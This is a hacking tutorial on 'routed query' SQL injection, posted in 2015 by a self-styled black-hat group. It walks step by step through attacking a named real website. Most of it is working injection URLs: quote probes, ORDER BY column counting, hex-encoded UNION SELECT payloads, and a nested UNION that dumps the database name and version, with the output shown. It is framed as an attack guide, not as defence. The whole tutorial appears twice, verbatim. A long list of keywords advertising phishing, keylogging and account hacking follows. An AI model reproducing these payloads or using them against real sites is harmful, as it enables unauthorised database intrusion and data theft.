Sqli With Routed Query
Less:-6. Sqli With Routed Query.
Tutorials by Team Hind And CyberSecuritySquad
Intro About Me:-
Name :- Navdeep Singh
Facebook_id= https://www.facebook.com/navdeep.dhukia.5
Facebook_offical Page(CSS)= https://www.facebook.com/BlackHatHackers555
Facebook_offical Page(Team_Hind) https://www.facebook.com/TeamHind/
Website:- http://www.securitykiller.org
Step2. I Have A Website.
i Have A site http://www.agritechno.ch/index2.php?rub=11
we will add single quoto(') after:- ?rub=11'
Like This http://www.agritechno.ch/index2.php?rub=11'
Hit Enter
Step3. After adding the Sigle Quoto(') If Site Showing Some Sqli Error Or Hide Data On This This Mins Its Valurnable.
Step4. Start The Opration On Url, Now We Will Count total Number Of Columns In Information_schema.
We Will Use Order By Query For The Count The Columns.
Like This:- http://www.agritechno.ch/index2.php?rub=11 order by 1--
It is Showing error so First i Fix The Query I Replace (--) For Fix My Query, I add (;) After Order By.
Ex:-http://www.agritechno.ch/index2.php?rub=11 group by 14;
now total number of columns is between 1 to 100 .
Here Total No. of Columns is 14 Because In 15 We Got Error.
Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns
Like This:- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14;
We Didnt See There Any Valurnable Columns That Mins Its A Routed Query Injection.
Now Start The Routed Query Operation, We Find Which Columns Is Routed Query.
Well How To Check That Such A Column Is A Routed Query ??????
There Is A Trick For That
Put A apostrope/single quote after each no of columns and (Hex) Them.
Step6.If The Page Gets Redirected or if we get error on Page, Then We Can assume That The Columns As Routed Query.
Like This:-
Ex1. http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1',2,3,4,5,6,7,8,9,10,11,12,13,14;
Now Decypted In Hex(1'):- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 0x3127,2,3,4,5,6,7,8,9,10,11,12,13,14;
Check All The Columns Like This:-
Here Is Column No. 11 Is Routed Now Check It:-
http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11',12,13,14;
Hex(11'):- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,0x313127,12,13,14;
Sql Error
Hip Hip Hurray We Got It Routed Column That Is (11).
Step7. Now Lets Get The Column Count And Valurnable Column As Well
Like This:- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"11 order by 20--",12,13,14;
Error Here Is Not 20 Columns Now Decress The Columns.
Now Try To put 19 in order by
Like This:- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"11 order by 19--",12,13,14;
No Error :- Here Is 19 Columns In Routed Query(11).
Step8. Now Use Union Statement.
Like This:-http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",12,13,14;
Congo We Got It valurnable Columns That is 3,14
Now All Step Is Same Like Lession1.(simple Union based)
Step9. Now Find Database And Version.
Like This:-
http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 0x3127,2,3,4,5,6,7,8,9,10,"-11 UNION SELECT 1,2,concat(database(),0x7c3d7c,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",12,13,14;
You See On Website Page:- Database Is= 'agritechnoch' , Version= '5.0.67-log'
I Thing You All Are Understand Now Find table,Columns And fetch Data Like Simple Union Based.
Follow Me On You Tube:-
Less No.2:- sqli Union based With waf bypass
Upload on Tom. 08-09-2015
We Are:- | VIKYP | INDCYBERJOCKER | In73ct0r d3vil | Navdeep Singh | CYBA TIGER | ANONFIGHTER | Mr.Hex | GHOSTF133T | VINEET RV | Hacker Ritz | SNIPER |
Download This Txt File On You tube,Under This Video.
Download hackBar Pro I Leave A Link Under The Video Download here.
Keywords:-
Hacking By Navdeep Singh, Hackers Blog, Black Hat Hacker,
Hackers, hacking, Hacking News Blog, Free Hacking Study, Best Hacking Institute, Xss, Cross Site Scripting, Stored XSS, How To Hack, Hacking Book, Hacking Tools, Hacking Tutorials, Windows Hacking, Advance System Hacking, Website Hacking, Hacking News, Hackers News, The Hackers News
Mobile Hacking, Games Hacking, Android Hacking, Facebook Hacking, Google Hacking, Google Dorks, Email Hacking, Virus, Gmail Hacking, Whats App Hacking, Ip Changer, Ip Hide, tor, Cracking Tools, email hacking, Android Tools For Hacker, Mobile Game Hacking, Pc Game hacking, Facebook Trick, Clickjacking, Metasploit Tutorial, phising, phising attack, Keylogger Tutorial, Keylogger, KALI AND BACKTRACK, KALI AND BACKTRACK Tutorial, Web Hacking, Sqli, Sql Injection, Sqli Cheat Sheet, Sqli Admin Bypass
Intro About Me:-
Name :- Navdeep Singh
Facebook_id= https://www.facebook.com/navdeep.dhukia.5
Facebook_offical Page(CSS)= https://www.facebook.com/BlackHatHackers555
Facebook_offical Page(Team_Hind) https://www.facebook.com/TeamHind/
Website:- http://www.securitykiller.org
Step2. I Have A Website.
i Have A site http://www.agritechno.ch/index2.php?rub=11
we will add single quoto(') after:- ?rub=11'
Like This http://www.agritechno.ch/index2.php?rub=11'
Hit Enter
Step3. After adding the Sigle Quoto(') If Site Showing Some Sqli Error Or Hide Data On This This Mins Its Valurnable.
Step4. Start The Opration On Url, Now We Will Count total Number Of Columns In Information_schema.
We Will Use Order By Query For The Count The Columns.
Like This:- http://www.agritechno.ch/index2.php?rub=11 order by 1--
It is Showing error so First i Fix The Query I Replace (--) For Fix My Query, I add (;) After Order By.
Ex:-http://www.agritechno.ch/index2.php?rub=11 group by 14;
now total number of columns is between 1 to 100 .
Here Total No. of Columns is 14 Because In 15 We Got Error.
Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns
Like This:- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14;
We Didnt See There Any Valurnable Columns That Mins Its A Routed Query Injection.
Now Start The Routed Query Operation, We Find Which Columns Is Routed Query.
Well How To Check That Such A Column Is A Routed Query ??????
There Is A Trick For That
Put A apostrope/single quote after each no of columns and (Hex) Them.
Step6.If The Page Gets Redirected or if we get error on Page, Then We Can assume That The Columns As Routed Query.
Like This:-
Ex1. http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1',2,3,4,5,6,7,8,9,10,11,12,13,14;
Now Decypted In Hex(1'):- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 0x3127,2,3,4,5,6,7,8,9,10,11,12,13,14;
Check All The Columns Like This:-
Here Is Column No. 11 Is Routed Now Check It:-
http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11',12,13,14;
Hex(11'):- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,0x313127,12,13,14;
Sql Error
Hip Hip Hurray We Got It Routed Column That Is (11).
Step7. Now Lets Get The Column Count And Valurnable Column As Well
Like This:- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"11 order by 20--",12,13,14;
Error Here Is Not 20 Columns Now Decress The Columns.
Now Try To put 19 in order by
Like This:- http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"11 order by 19--",12,13,14;
No Error :- Here Is 19 Columns In Routed Query(11).
Step8. Now Use Union Statement.
Like This:-http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,"-11 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",12,13,14;
Congo We Got It valurnable Columns That is 3,14
Now All Step Is Same Like Lession1.(simple Union based)
Step9. Now Find Database And Version.
Like This:-
http://www.agritechno.ch/index2.php?rub=-11 UNION SELECT 0x3127,2,3,4,5,6,7,8,9,10,"-11 UNION SELECT 1,2,concat(database(),0x7c3d7c,version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--",12,13,14;
You See On Website Page:- Database Is= 'agritechnoch' , Version= '5.0.67-log'
I Thing You All Are Understand Now Find table,Columns And fetch Data Like Simple Union Based.
Follow Me On You Tube:-
Less No.2:- sqli Union based With waf bypass
Upload on Tom. 08-09-2015
We Are:- | VIKYP | INDCYBERJOCKER | In73ct0r d3vil | Navdeep Singh | CYBA TIGER | ANONFIGHTER | Mr.Hex | GHOSTF133T | VINEET RV | Hacker Ritz | SNIPER |
Download This Txt File On You tube,Under This Video.
Download hackBar Pro I Leave A Link Under The Video Download here.
Keywords:-
Hacking By Navdeep Singh, Hackers Blog, Black Hat Hacker,
Hackers, hacking, Hacking News Blog, Free Hacking Study, Best Hacking Institute, Xss, Cross Site Scripting, Stored XSS, How To Hack, Hacking Book, Hacking Tools, Hacking Tutorials, Windows Hacking, Advance System Hacking, Website Hacking, Hacking News, Hackers News, The Hackers News
Mobile Hacking, Games Hacking, Android Hacking, Facebook Hacking, Google Hacking, Google Dorks, Email Hacking, Virus, Gmail Hacking, Whats App Hacking, Ip Changer, Ip Hide, tor, Cracking Tools, email hacking, Android Tools For Hacker, Mobile Game Hacking, Pc Game hacking, Facebook Trick, Clickjacking, Metasploit Tutorial, phising, phising attack, Keylogger Tutorial, Keylogger, KALI AND BACKTRACK, KALI AND BACKTRACK Tutorial, Web Hacking, Sqli, Sql Injection, Sqli Cheat Sheet, Sqli Admin Bypass
Sqli With Routed Query
Reviewed by Unknown
on
12/09/2015
Rating: